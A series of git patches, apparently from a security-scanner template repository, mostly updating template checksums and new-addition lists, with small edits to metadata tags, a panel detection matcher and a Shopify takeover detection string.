+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7050,7 +7051,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:1ca9a31f1872bde0774cf99809d548e12cffe794 +templates-checksum.txt:52d683296c67792baeb52713a0571e79a36e02f4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d9a3f441a0382ac2a4f04f5ff523dca10c8aff03 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 8 Sep 2023 17:26:35 +0530 Subject: [PATCH 0226/1090] Update seafile-api.yaml --- http/exposures/apis/seafile-api.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index eb1edae7ed..57a89a448d 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"seafile" - tags: exposure,api + tags: exposure,api,detect http: - method: GET From 2a8640d8e2b4ba4edf461d6a5b2669f5fb494314 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 8 Sep 2023 17:28:27 +0530 Subject: [PATCH 0227/1090] Update kingdee-erp-rce.yaml --- http/vulnerabilities/other/kingdee-erp-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/kingdee-erp-rce.yaml b/http/vulnerabilities/other/kingdee-erp-rce.yaml index 0b33f6697e..cbcc086fe9 100644 --- a/http/vulnerabilities/other/kingdee-erp-rce.yaml +++ b/http/vulnerabilities/other/kingdee-erp-rce.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20%E4%BA%91%E6%98%9F%E7%A9%BA%20kdsvc%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="金蝶云星空-管理中心" verified: true + fofa-query: app="金蝶云星空-管理中心" tags: kingdee-erp,rce,intrusive http: From 98ce1f5d52e5a9360fce667ce49ffd919cc2bc9e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 11:58:49 +0000 Subject: [PATCH 0228/1090] Auto Generated New Template Addition List [Fri Sep 8 11:58:49 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6b52439588..9ac8438437 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/cves/2023/CVE-2023-36844.yaml http/cves/2023/CVE-2023-39361.yaml http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml +http/exposed-panels/dxplanning-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml http/exposed-panels/snapcomms-panel.yaml From 6134f273fe7e09c621e4eb78997c2a8de4920c63 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 11:59:00 +0000 Subject: [PATCH 0229/1090] Auto Generated Templates Checksum [Fri Sep 8 11:59:00 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e01e7430b2..3d64db7b73 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3010,6 +3010,7 @@ http/exposed-panels/drone-ci-panel.yaml:7b990e9b865f0969e3051d0b9c465bc9ed5b429f http/exposed-panels/druid-console-exposure.yaml:43a3f81fdd0806338c1129bb3c83a85c2c8e196e http/exposed-panels/druid-panel.yaml:7de20dae7d060d544534b213412f223012e99e92 http/exposed-panels/drupal-login.yaml:d0a2b858b062019ed15eb55fb442c865691eaca8 +http/exposed-panels/dxplanning-panel.yaml:445d0dc8c2e08a18af64b9fe3c5bee606d380de3 http/exposed-panels/dynamicweb-panel.yaml:ebb92f92a4afcce6be9b5520882f2c24f400fd0d http/exposed-panels/dynatrace-panel.yaml:445cf0ce7faf6f856e627ceb66d40d60ed8ca7e3 http/exposed-panels/dzzoffice/dzzoffice-install.yaml:47847ae86c9c33ca3205b810983633ec92a61aff @@ -7051,7 +7052,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:52d683296c67792baeb52713a0571e79a36e02f4 +templates-checksum.txt:ee736fdb3221be514c8b2f6544104554ee35d7b6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ebcdbd83cd470bd1749b5987271afca4961fba7a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 12:00:27 +0000 Subject: [PATCH 0230/1090] Auto Generated New Template Addition List [Fri Sep 8 12:00:26 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9ac8438437..fcebca2afe 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/dxplanning-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml http/exposed-panels/snapcomms-panel.yaml +http/exposures/apis/seafile-api.yaml http/miscellaneous/external-service-interaction.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml From 14c46c7276564a8868f223c88e2c987ce8152004 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 12:00:36 +0000 Subject: [PATCH 0231/1090] Auto Generated Templates Checksum [Fri Sep 8 12:00:36 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3d64db7b73..40ea9c31b5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3731,6 +3731,7 @@ http/exposures/apis/couchbase-buckets-api.yaml:500c035af9e74736ebdb00d3c091fccb8 http/exposures/apis/drupal-jsonapi-user-listing.yaml:c7b8ab5819a8c8c516bb9897695190bf33b62dbc http/exposures/apis/jeecg-boot-swagger.yaml:dc3fcfe73d3514b2d0a164fdf65ac60d72b35929 http/exposures/apis/openapi.yaml:b7e999de40e2d0a7b2f5fef41b4da3a8a18e5771 +http/exposures/apis/seafile-api.yaml:fea8d780429723f821956791bc9215aed97c8a03 http/exposures/apis/strapi-page.yaml:cba66cec4c009a645b8fec71bc2dd7178ed57bc2 http/exposures/apis/swagger-api.yaml:93940aae468286aaa744de30e26203dc265382c7 http/exposures/apis/wadl-api.yaml:2a68bb9d0c83056fa661184364eaa3bb1676a9a0 @@ -7052,7 +7053,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:ee736fdb3221be514c8b2f6544104554ee35d7b6 +templates-checksum.txt:5b94072779755b9690dfb7e366083c28bab1070b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From dd2147a54789fb06852170ee2906a61e7259d1d6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 8 Sep 2023 17:35:12 +0530 Subject: [PATCH 0232/1090] Update dxplanning-panel.yaml --- http/exposed-panels/dxplanning-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index 74fb85cec7..ffb47bcce4 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -23,6 +23,7 @@ http: - type: dsl dsl: - "contains(tolower(body), 'dxplanning/webbooking/')" + - "contains(body, 'Webbooking')" - "status_code==200" condition: and From b712cc7b2b778e1b39b3a533a409601d29d0bba1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 12:08:57 +0000 Subject: [PATCH 0233/1090] Auto Generated New Template Addition List [Fri Sep 8 12:08:56 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fcebca2afe..6f50780c04 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml http/vulnerabilities/jorani/jorani-benjamin-xss.yaml http/vulnerabilities/other/huatian-oa8000-sqli.yaml +http/vulnerabilities/other/kingdee-erp-rce.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml From f2341febdc4e3f98186ed46be3b4db7694c643ae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 12:08:59 +0000 Subject: [PATCH 0234/1090] Auto Generated Templates Checksum [Fri Sep 8 12:08:59 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 40ea9c31b5..0986fce37d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6526,6 +6526,7 @@ http/vulnerabilities/other/kevinlab-bems-sqli.yaml:1d477f20f22dc2fad514eb4c7f89f http/vulnerabilities/other/kevinlab-hems-backdoor.yaml:432e3630adcb995dfd17133b380f417c36dde2d0 http/vulnerabilities/other/keycloak-xss.yaml:d20e3322f3430593356ac31c1ba2b9a0d6389d40 http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:4a0dda044e05cda0742d803bc497b69fa89a5f0c +http/vulnerabilities/other/kingdee-erp-rce.yaml:903acb03daa2661f25064280e9be807b39b6c211 http/vulnerabilities/other/kingsoft-v8-file-read.yaml:aa0e37be669e21c2f3a608952a0bd1c94394632f http/vulnerabilities/other/kiwitcms-json-rpc.yaml:04ed57277189ff7f95571626e9980dd6b1cfadae http/vulnerabilities/other/kodak-network-lfi.yaml:d88bb8fad85354c8f837531c3936efad0b377ff1 @@ -7053,7 +7054,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:5b94072779755b9690dfb7e366083c28bab1070b +templates-checksum.txt:b703157fe7dbf7f851fda70fddb2de0e93ff3080 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From cdea9892144a405a2641c78de68c5ceb6c5f5496 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 12:10:12 +0000 Subject: [PATCH 0236/1090] Auto Generated Templates Checksum [Fri Sep 8 12:10:12 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0986fce37d..6d5d50425b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3010,7 +3010,7 @@ http/exposed-panels/drone-ci-panel.yaml:7b990e9b865f0969e3051d0b9c465bc9ed5b429f http/exposed-panels/druid-console-exposure.yaml:43a3f81fdd0806338c1129bb3c83a85c2c8e196e http/exposed-panels/druid-panel.yaml:7de20dae7d060d544534b213412f223012e99e92 http/exposed-panels/drupal-login.yaml:d0a2b858b062019ed15eb55fb442c865691eaca8 -http/exposed-panels/dxplanning-panel.yaml:445d0dc8c2e08a18af64b9fe3c5bee606d380de3 +http/exposed-panels/dxplanning-panel.yaml:a3a6baee34ab9ab65ab48465e73dd77157dcc459 http/exposed-panels/dynamicweb-panel.yaml:ebb92f92a4afcce6be9b5520882f2c24f400fd0d http/exposed-panels/dynatrace-panel.yaml:445cf0ce7faf6f856e627ceb66d40d60ed8ca7e3 http/exposed-panels/dzzoffice/dzzoffice-install.yaml:47847ae86c9c33ca3205b810983633ec92a61aff @@ -7054,7 +7054,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:b703157fe7dbf7f851fda70fddb2de0e93ff3080 +templates-checksum.txt:34b223abd074c2722835b86e495a8915b2931d48 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8934b7508b683b681e144cde20813a7832284b00 Mon Sep 17 00:00:00 2001 From: Imjust0 <38808999+muthumohanprasath@users.noreply.github.com> Date: Fri, 8 Sep 2023 18:21:40 +0530 Subject: [PATCH 0237/1090] Update shopify-takeover.yaml --- http/takeovers/shopify-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml index 19be314a84..75e60fe78e 100644 --- a/http/takeovers/shopify-takeover.yaml +++ b/http/takeovers/shopify-takeover.yaml @@ -2,7 +2,7 @@ id: shopify-takeover info: name: shopify takeover detection - author: pdteam,philippedelteil + author: pdteam,philippedelteil,Imjust0 severity: high reference: - https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75 @@ -28,6 +28,7 @@ http: words: - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' - "Sorry, this shop is currently unavailable." + - "Sorry, this store is currently unavailable." condition: or - type: word From 